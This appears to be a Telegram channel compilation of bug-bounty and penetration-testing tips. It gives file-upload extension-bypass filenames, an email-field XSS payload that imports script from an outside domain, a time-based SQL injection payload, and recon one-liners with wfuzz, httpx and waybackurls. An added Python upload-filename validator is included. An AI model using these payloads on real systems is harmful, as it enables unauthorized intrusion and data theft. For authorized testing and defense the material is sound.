Termux All Command [Telegram Group]
Hello, this is the Termux All Command official Telegram group. All kinds of resources are shared here. It is also a backup of the Facebook page.
Telegram Channel >> https://t.me/termuxcommandfull
Facebook Page >> https://www.facebook.com/termux.command.full
GitHub link: https://github.com/noperator/panos-scanner
The next share is a simple script to check the URLs in a list.
1. Make sure you have some IPs (saved in the file 'lists') and that panos-scanner.py exists
2. Run this script
while read -r url; do echo ""; echo "==[ $url ]=="; ./panos-scanner.py -v -t "$url" -s | jq '.match'; done < lists
3. You will see which are alive and which are not
Laravel for Beginners & Intermediate
https://drive.google.com/drive/mobile/folders/1FAu9fe1VVhYjUvB2j7jaaN3gmRUdK9Fz
1- Kali Linux Complete Course : https://lnkd.in/eVcMQgBc
2- Network Scanning Complete Course : https://lnkd.in/ea-xg5Tn
3- Metasploit Complete Course : https://lnkd.in/ex-Mz747
Common file upload extensions (insecure file upload): .NET .action, .asa, .asax, .ascx, .ashx, .asmx, .asp, .aspq, .aspx, .axd, .cer, .cfc, .cfchart, .cfm, .cfml, .cfr, .cgi, .coffee, .coffeec, .config, .cs, .cshtm, .cshtml, .csproj, .ctp, .dbm, .do, .dot, .ecr, .ejs, .es, .es6, .fti, .ftl, .haml, .handlebars, .handlebars.coffee, .handlebars.ecr, .handlebars.litcoffee, .hogan, .hogan.coffee, .hogan.ecr, .hogan.litcoffee, .hphp, .htaccess, .inc, .jade, .js, .jsm, .jsp, .jspf, .jspx, .jst, .jst.coffee, .jst.ecr, .jst.litcoffee, .jsv, .jsw, .less, .litcoffee, .marko, .master, .mjs, .module, .mustache, .mustache.js, .nunjucks, .pgif, .phar, .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .pht, .phtm, .phtml, .pl, .pug, .rem, .sass, .scaml, .shtml, .jsp, .slim, .sln, .soap, .ssi, .svc, .swf, .swig, .tpl, .tpl.coffee, .tpl.ecr, .tpl.litcoffee, .vb, .vbhtm, .vbhtml, .vbproj, .volt, .wsdl, .wss, .xsd, .xsl, .yaws
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.file.php
file.pHp5
file.png.php
file.png.pHp5
file.php#.png
file.php%00.png
file.php\x00.png
file.php%0a.png
file.php%0d%0a.png
file.phpJunk123png
file.png.jpg.php
file.php%00.png%00.jpg
--> You can brute-force with Burp to find which extensions are allowed on that server
--> You can encode with ASCII and Unicode
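A server-side check that rejects the filename forms listed above, as an added example that is not part of the original post. The image-only allowlist and the function names are assumptions made for illustration.

```python
import re
import unicodedata
import uuid
from urllib.parse import unquote

# Assumption: this upload endpoint accepts images only.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}
# One base name, exactly one dot, one short extension. Spaces, control
# characters, slashes, backslashes, '#', '%' and extra dots all fail to match.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})")


def fully_decode(name, max_rounds=3):
    """Undo nested percent-encoding; None if it never settles."""
    for _ in range(max_rounds):
        decoded = unquote(name)
        if decoded == name:
            return name
        name = decoded
    return None


def safe_storage_name(raw_name):
    """Return a server-generated name for an acceptable upload, else None."""
    name = fully_decode(raw_name)
    if name is None:
        return None
    # Fold fullwidth and other compatibility forms to ASCII before matching.
    name = unicodedata.normalize("NFKC", name)
    match = SAFE_NAME.fullmatch(name)
    if match is None:
        return None
    extension = match.group(1).lower()
    if extension not in ALLOWED_EXTENSIONS:
        return None
    # Never reuse the client's name on disk; keep only the vetted extension.
    return f"{uuid.uuid4().hex}.{extension}"


# Constructed sample input: filename forms taken from the list above.
REJECTED = ["file.php%20", "file.php%0a", "file.php%00.png", "file.php/",
            "file.pHp5", "file.png.php", "file.php#.png", "file.png.jpg.php",
            "file.php%0d%0a.png", "file.phpJunk123png", "photo\uff0ephp"]

if __name__ == "__main__":
    for candidate in REJECTED:
        print(repr(candidate), "->", safe_storage_name(candidate))
    print("photo.PNG ->", safe_storage_name("photo.PNG"))
```

An extension allowlist is only one layer: the file content should also be checked against the expected type, and uploads should be stored where the server will not execute them.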
🚨Subhunter- A fast subdomain takeover tool 🚨
👉Features:
Auto update
Uses random user agents
Built in Go
Uses a fork of fingerprint data from well known sources (can-i-take-over-xyz)
🔗Link- https://zurl.co/nx8R
Lots of python file : https://github.com/fortra/impacket/tree/master/examples
Bug-Bounty-Free-Resources ✅ https://github.com/RohanGiriSquad/Bug-Bounty-Free-Resources
XSS in an email address is underrated (email is rarely sanitized by companies). Use a catch-all and then you can also verify your account (if required).
"><img/src/onerror=import('//domain/')>"@yourdomain.com
#bugbounty #bug bounty tips
🔎 Recursive Fuzzing with WFUZZ 💻
wfuzz -c -z file,wordlist -R 3 --sc 301,200 target/FUZZ
#bugbountytips #bugbounty
httpx -l hosts.txt -path "/_fragment?_path=_controller=phpcredits&flag=-1" -threads 100 -random-agent -x GET -tech-detect -status-code -follow-redirects -title -mc 200 -match-regex "PHP Credits"
#bugbounty #tips
Time based SQL Injection using waybackurls
waybackurls TARGET.COM | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt
#sql_injection #bughunting
Cyber Security Cheatsheet : https://github.com/andrewjkerr/security-cheatsheets
VMware Fusion Pro and Workstation Pro are both now available free for Personal Use!
Get all of the details:
https://blogs.vmware.com/teamfusion/2024/05/fusion-pro-now-available-free-for-personal-use.html
Some common parameters in JSON:
dest=
path=
window=
next=
site=
reference=
data=
load=
html=
validate=
page=
return=
callback=
domain=
view=
dict=
pdf=
file=
imageuri=
url=
key=
oauth
redirect=
Some dorking sites:
https://taksec.github.io/google-dorks-bug-bounty/
https://nitinyadav00.github.io/Bug-Bounty-Search-Engine/
https://dorks.faisalahmed.me/#
https://thegrayarea.tech/5-google-dorks-every-hacker-needs-to-know-fed21022a906
https://hazanasec.github.io/2021-03-11-Dorking-on-Steriods/
https://mr-koanti.github.io/github.html
x-forwarded-host
x-forwarded-for
reflections in the response!
This may lead to SSRF or XSS or caching vulns!
link: https://lnkd.in/dcXgGXJn
$$$$Time-Based SQL Injection to Dumping the Database!
Payload: ' AND if(now()=sysdate(),SLEEP(5),0)-- wXyW
🚨 XSS Hunting from WaybackURLS 🔍
Payload :
waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls-xss.txt | sort -u -o urls-xss.txt && cat urls-xss.txt | kxss
